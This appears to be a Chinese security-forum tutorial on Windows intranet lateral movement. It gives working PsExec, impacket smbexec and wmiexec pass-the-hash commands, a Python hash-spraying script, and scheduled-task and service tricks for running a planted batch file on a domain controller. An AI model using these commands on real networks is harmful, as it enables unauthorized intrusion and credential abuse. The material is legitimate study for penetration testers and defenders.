问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
内网横向渗透之各种传递攻击
渗透测试
# 内网横向渗透之各种传递攻击 ## 前言 在前面一篇文章已经对内网信息收集做了详细介绍,所需要的内网环境也包含在那篇文章中,接下来将以前期内网信息收集到的信息为基础介绍各种明文或hash...
内网横向渗透之各种传递攻击 ============= 前言 -- 在前面一篇文章已经对内网信息收集做了详细介绍,所需要的内网环境也包含在那篇文章中,接下来将以前期内网信息收集到的信息为基础介绍各种明文或hash传递攻击进行横向渗透。 横向渗透 ---- 在拿下一台内网主机后,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的。我们掌握的方法越多,可能拿到的主机权限的机会就越大。 利用PsExec工具进行横向渗透 ---------------- PsExec 最强大的功能之一是在远程系统和远程支持工具(如 ipconfig)中启动交互式命令提示窗口,以便显示无法通过其他方式显示的有关远程系统的信息,并且可以获得与控制台应用程序相当的完全交互性。PsExec的使用不需要对方主机开放3389端口,只需要对方开启admin$共享 (该共享默认开启)。由于PsExec是Windows提供的工具,所以杀毒软件将其列在白名单中。 **下载地址:** <https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec> **主要有以下两种攻击方法** **1.Psexec需建立ipc链接进行横向渗透** ```php net use \\192.168.3.144\ip$ “admin!@#45” /uesr:administrator #建立IPC链接,出现下列弹框点击agree psexec \\192.168.3.64 -s cmd cmd #-s,表示以system权限运行窗口,成功返回目标主机system权限窗口 ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-69884f43ad56b227c3704ff5ab77fd1219335ab9.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-69884f43ad56b227c3704ff5ab77fd1219335ab9.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-fe8c8fae38a19273a5e5b5d0b217e915cdaa793e.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-fe8c8fae38a19273a5e5b5d0b217e915cdaa793e.png) **2.Psexec不需要建立ipc链接进行横向渗透** ```php psexec \\192.168.3.144 -u administrator -p admin!@#45 -s cmd ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-2f822d57820ea094010b5e15f8f44733cebccde6.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-2f822d57820ea094010b5e15f8f44733cebccde6.png) 在这些情况下我们无法获取明文密码 Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码 Windows系统LM Hash及NTLM Hash加密算法,个人系统在windows vista后,服务器系统在windows2003以后,认证方式均为NTLM Hash 此时进行横向渗透测试使用官方自带的psexec行不通 ```php psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.144 ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-e18ce8d2e060e60249a6774dfcaeed10b6d181df.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-e18ce8d2e060e60249a6774dfcaeed10b6d181df.png) 利用impacket中的工具包进行横向渗透 --------------------- **1.PSExec(非官方自带)工具进行横向渗透** 为了解决无法获取明文进行传递攻击的问题,使用非官方自带的psexec进行hash传递,虽说这个与上面的名字一样,但是这并不是微软自带的工具。 使用impacket工具包,操作简单,但由于非官方自带,很有可能被杀毒软件查杀。 下载地址: <https://github.com/maaaaz/impacket-examples-windows> ```php psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.144 ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-d3a35fdcba15544f07f98cbcb9bc317c6629cd66.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-d3a35fdcba15544f07f98cbcb9bc317c6629cd66.png) **2.smbexec实现无需建立ipc链接传递明文进行横向渗透** ```php smbexec ./administrator:admin!@#45@192.168.3.144 链接本地组用户 ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-79703ee2f169fed1434b2100ae562ef407ba522f.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-79703ee2f169fed1434b2100ae562ef407ba522f.png) ```php smbexec ROOTKIT.ORG/administrator:admin!@#45@192.168.3.144 链接域内用户 ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-b4df125f46d1840ae72fc39e16fded948da83f3f.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-b4df125f46d1840ae72fc39e16fded948da83f3f.png) **3.smbexec实现无需建立ipc链接传递hash进行横向渗透** ```php smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.144 ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-7c3d36dfafcf28ccb645fe4906ee55b3e6c63f8b.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-7c3d36dfafcf28ccb645fe4906ee55b3e6c63f8b.png) 利用WMI进行横向渗透 ----------- **WMI简介** WMI的全名为(Windows Management Instrumentation)由于安全厂商开始将PsExec加入了黑名单,所以攻击者暴露的可能性陡然增加。根据研究情况来看,Windows操作系统默认不会将WMI的操作记录到日志当中,而且因为采用的是无文件攻击,所以导致WMI具有极高的隐蔽性。由此,越来越多的APT开始使用WMI进行攻击,利用WMI可以进行信息收集、探测、反病毒、虚拟机检测、命令执行、权限持久化等操作。 **作用:**Windows操作系统都支持WMI。WMI是由一系列工具集组成的,可以在本地或者远程管理计算机系统。通过135端口进行利用,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。 **利用系统自带的wmic 进行明文传递横向渗透** ```php wmic /node:192.168.3.144 /user:administrator /password:admin!@#45 process call create "md.exe /c ipconfig >C:\3.txt" ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-463b7d6feb569a70afa871c6f86208842792a7f8.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-463b7d6feb569a70afa871c6f86208842792a7f8.png) 在使用自带的wmic时,无回显,ipconfig这条命令显示的内容保存在3.txt文件中,并且是在对方的主机中,较为鸡肋。 [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-d2ce397f26437a1cf86196db3816cc5ef4cb47c7.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-d2ce397f26437a1cf86196db3816cc5ef4cb47c7.png) **利用wmiexec.vbs与cscript配合进行横向渗透** 为了解决有回显的问题,使用自带的cscript进行明文传递,但需要配合wmiexec.vbs才可以,wmiexec.vbs脚本通过VBS调用WMI来模拟PsExec的功能。其可以在远程系统中执行命令并进行回显,获取远程主机的半交互式Shell。这个文件一般不会被防护软件查杀,使用时需要将目录切换至拥有wmiexec.vbs的目录下,该方法较好,推荐使用。 **wmiexec.vbs下载地址**:<https://pan.baidu.com/s/1hsSuQLiolqqcUUHgmjPW7A> 提取码:4534 ```php cscript //nologo wmiexec.vbs /shell 192.168.3.144 Administrator admin!@#45 ##192.168.3.144主机的系统权限 ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-37610912bab9decbeb1f39edd8dd9c9cca652a72.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-37610912bab9decbeb1f39edd8dd9c9cca652a72.png) ```php cscript //nologo wmiexec.vbs /shell 192.168.3.73 Administrator Admin12345 ##返回192.168.3.73主机的系统权限 ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-5b2d0c6936d24f620f56ca46a4fc49872efa36be.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-5b2d0c6936d24f620f56ca46a4fc49872efa36be.png) **利用非系统自带的wmiexec进行横向渗透** 使用impacket工具包中的wmiexec,进行明文hash传递横向渗透, 有回显 ```php wmiexec ./Administrator:admin!@#45@192.168.3.144 "whoami" ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-544b9ec03539cc8aa8fa545a27781890ec2f0faf.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-544b9ec03539cc8aa8fa545a27781890ec2f0faf.png) 当我们反弹回system权限的命令终端时,一般利用自带的WMI常用命令来进行操作操作 ```php wmiexec -hashes :518b98ad4178a53695dc997aa02d455c Administrator@192.168.3.73 "whoami" ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-91423b6191890fd28db44e28a53acbbe518a276a.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-91423b6191890fd28db44e28a53acbbe518a276a.png) ```php wmiexec -hashes :518b98ad4178a53695dc997aa02d455c Administrator@192.168.3.144 "whoami" ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-7324425ed094aacbd6b91261a7fc011488845b7b.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-7324425ed094aacbd6b91261a7fc011488845b7b.png) 利用脚本生成exe批量横向渗透 --------------- Python脚本: ```python import os, time ips = { '192.168.3.144', '192.168.3.73', '192.168.3.75' } users = { 'Administrator', 'administrator', 'backup', 'webadmin', 'jerry', 'mary', 'webadmin' } hashs = { 'ccef208c6485269c20db2cad21734fe7', '518b98ad4178a53695dc997aa02d455c' } for ip in ips: for user in users: for mimahash in hashs: # wmiexec -hashes :hash god/user@ip whoami exec = "wmiexec -hashes :" + mimahash + " rootkit/" + user + "@" + ip + " whoami" exec1 = "wmiexec -hashes :" + mimahash + " ./" + user + "@" + ip + " whoami" print('--->' + exec + '<---') print('--->' + exec1 + '<---') os.system(exec) time.sleep(0.5) ``` 安装pyinstaller:`pip install pyinstaller` [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-b3e69513a0fc73a953ad3858c302e2c871fd2026.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-b3e69513a0fc73a953ad3858c302e2c871fd2026.png) 将python文件打包成exe程序 [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-5a237138eee77a8add1f9db94c2de168e1dc7ed1.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-5a237138eee77a8add1f9db94c2de168e1dc7ed1.png) 这里特别要注意,在运行时需要将程序放到拥有wmiexec.exe的目录下,因为程序在运行时会调用它,因为在python脚本中有对wmiexec进行引用。 [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-2e81101102a818d20b7d0893295c6d18f595efef.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-2e81101102a818d20b7d0893295c6d18f595efef.png) 最终结果 [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-68660bc68db5a001371c2b80159fd17d18d3652b.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-68660bc68db5a001371c2b80159fd17d18d3652b.png) IPC+Windows服务来进行横向移动 -------------------- **利用sc横向渗透** 使用Windows服务来进行横向移动有点类似利用计划任务进行横向移动,核心是将木马文件传入目标机中,然后通过SC命令创建一个Windows服务用来指向传入的木马文件,最后启动该服务或者重启目标机即可触发该木马,实现横向移动。 在使用sc命令横向渗透时,首先也得先建立ipc链接,将要运行的服务拷贝过去目标主机,创建服务:`sc \\192.168.3.144 create cmd binpath="c:\cmd.bat"`发现可以为目标主机创建服务,但是在启动服务时,却一直报错,于是我想通过schtasks来启动服务也不可以,这到底是什么原因呢? [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-5919147f0bdc76db726bc6f0280abf7e2819b22a.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-5919147f0bdc76db726bc6f0280abf7e2819b22a.png) 通过查询大量的资料,发现在使用sc命令时,有两个个鸡肋就是不允许将bat做成服务运行,一般的exe也都不行,因为做成服务的可执行文件,它的代码编写是有固定格式的,这个exe程序服务需要提前准备好,因为要根据自己的需求编写。这一点一定要切记,在进行横向渗透测试时经常会忽略这样的一个小细节。 可是我既然不会写这样的服务,那我可不可以使用命令来验证sc命令是可行的呢?通过测试果真可以,如查询192.168.3.144的远程桌面连接服务的管理权限 `sc \\192.168.3.144 qprivs TermService` [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-cbea772d674c64cf7c3b56ef505fee502e1ab0ab.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-cbea772d674c64cf7c3b56ef505fee502e1ab0ab.png) 由于我这里没有成功执行程序,所以推荐一篇使用sc命令成功执行exe服务的文章,请参考: <https://www.freesion.com/article/2259895176/> IPC+计划任务进行横向渗透 -------------- **利用AT横向渗透** ```php net use \\192.168.3.144\ipc$ "admin!@#45"/user:rookit.org\administrator ``` 建立ipc连接,需要139,445端口开放,工作组需要加上域内名字,工作组不需要 [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-4681d3cce977c3c4f22645dec9bf96cc404ce234.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-4681d3cce977c3c4f22645dec9bf96cc404ce234.png) 编写一个添加一个用户的bat脚本,在实战情况下一般来讲是木马 [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-8ff147f90b2be41746ce736fd1a27e01a7fa02ef.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-8ff147f90b2be41746ce736fd1a27e01a7fa02ef.png) 将adduser.bat发送至域控`copy adduser.bat \\192.168.3.144\c$` [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-6577313963c036c51c0cac2a0c3d95655a51fb26.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-6577313963c036c51c0cac2a0c3d95655a51fb26.png) `at \\192.168.1.144 20:05 c:\adduser.bat` 设置计划任务,在这里测试,我发现并不是像网上所说,Windows<2012就可以使用at命令,这里的2008也已经弃用AT命令。 [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-c8e3fd5eaa42cb0f08832ab54c96f83c0cbb46a0.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-c8e3fd5eaa42cb0f08832ab54c96f83c0cbb46a0.png) **利用Schtasks进行横向渗透** ```php schtasks /create /s 192.168.3.144 /ru “SYSTEM” /tn adduser /sc DAILY /tr c:\adduser\adduser.bat /f 在这里使用schtasks时,通过大量的实验发现无论是在2008还是2012实验都无效,并且系统已经提升为系统权限,说明在这个环境中schtasks无法用来横向渗透 ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-67cf3029f1e938e9075217c5d73003b30cfaab0c.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-67cf3029f1e938e9075217c5d73003b30cfaab0c.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-b9d486121fc9bb284606bca91d433c2b24dc69ec.png)](https://shs3.b.qianxin.com/attack_forum/2021/07/attach-b9d486121fc9bb284606bca91d433c2b24dc69ec.png) 由于这里没有成功所以推荐大家参考这篇文章:<https://cloud.tencent.com/developer/article/1743842> **建立IPC失败的原因** (1)目标系统不是NT或以上的操作系统 (2)对方没有打开IPC$共享 (3)对方未开启139、445端口,或者被防火墙屏蔽 (4)输出命令、账号密码有错误 **建立IPC常见的错误代码** (1)5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限 (2)51:网络问题,Windows 无法找到网络路径 (3)53:找不到网络路径,可能是IP地址错误、目标未开机、目标Lanmanserver服务未启动、有防火墙等问题 (4)67:找不到网络名,本地Lanmanworkstation服务未启动,目标删除ipc$ (5)1219:提供的凭据和已经存在的凭据集冲突,说明已经建立了IPC$,需要先删除 (6)1326:账号密码错误 (7)1792:目标NetLogon服务未启动,连接域控常常会出现此情况 (8)2242:用户密码过期,目标有账号策略,强制定期更改密码 总结 -- 在这里几乎将明文和hash传递横向渗透攻击写完了,在内网横向渗透的过程中,我们要时刻考虑免杀的问题,有的横向渗透方法无法使用我们要果断放弃,希望这篇文章对您有所帮助。
发表于 2021-07-16 14:11:23
阅读 ( 7663 )
分类:
内网渗透
2 推荐
收藏
0 条评论
请先
登录
后评论
Honeypot
17 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!